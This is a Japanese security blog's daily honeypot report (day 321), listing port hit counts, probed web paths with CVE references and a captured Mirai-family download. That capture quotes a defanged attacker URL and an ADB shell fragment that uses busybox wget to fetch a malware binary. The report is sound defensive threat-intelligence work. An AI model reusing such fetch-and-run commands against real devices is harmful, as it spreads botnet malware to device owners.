sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(321日目:7/4)

Honeypot簡易分析(321日目:7/4)となります。

◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>

f:id:one-chick-sec:20190706194131p:plain

<ポート検知数(30日平均比)>
ポート番号 サービス 件数 件数差(30日平均)
445 smb 4444 912
23 telnet 1364 -107
5900 vnc 551 -4078
2323 telnet 136 52
3307 opsession-prxy 112 72
8789 Unknown  85 57
8889
ddi-tcp-2
ddi-udp-2
 85 73
13393 Unknown 84 74
2189 Unknown 84 74
3189 Unknown 84 55


<新規マルウェアダウンロード>
malware payload
hxxp://5.206.227[.]65/codingdrunk/fbot.arm CNXN............M.......host::features=cmd,shell_v2OPENX............4......shell:cd /data/local/tmp/; busybox wget
Mirai系のマルウェアでした。
<国別検知数および検知数>

f:id:one-chick-sec:20190706194358p:plain

<検知パス一覧>
path target CVE reference count
/ - - - 288
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 152
/favicon.ico - - - 8
/phpmyadmin phpMyAdmin - - 8
/robots.txt - - - 8
hxxp://110.249.212[.]46/testget Unauthorized Relay - - 4
/user/login.html Unknown - - 2
/.well-known/security.txt SSL certificate - https://qiita.com/comefigo/items/e9b1bce93c1b615e5934 1
/HNAP1 D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981 1
/evox/about Trane Tracer SC - https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 1
/sdk Vmware - https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse 1
/sitemap.xml xml sitemap - - 1
<新規検知パス一覧>
path target CVE reference
/Nmap/folder/check1562208120 Nmap - -
/NmapUpperCheck1562208120 Nmap - -
/nmaplowercheck1562208120 Nmap - -
/user/soapCaller.bs Morfeus Fucking Scanner - https://kaworu.jpn.org/kaworu/2008-12-27-1.php
hxxp://160[.]16[.]145[.]183/QUERY/en-us/msdn/ Unauthorized Relay - -
マルウェアダウンロード>
なし
 
以上となります。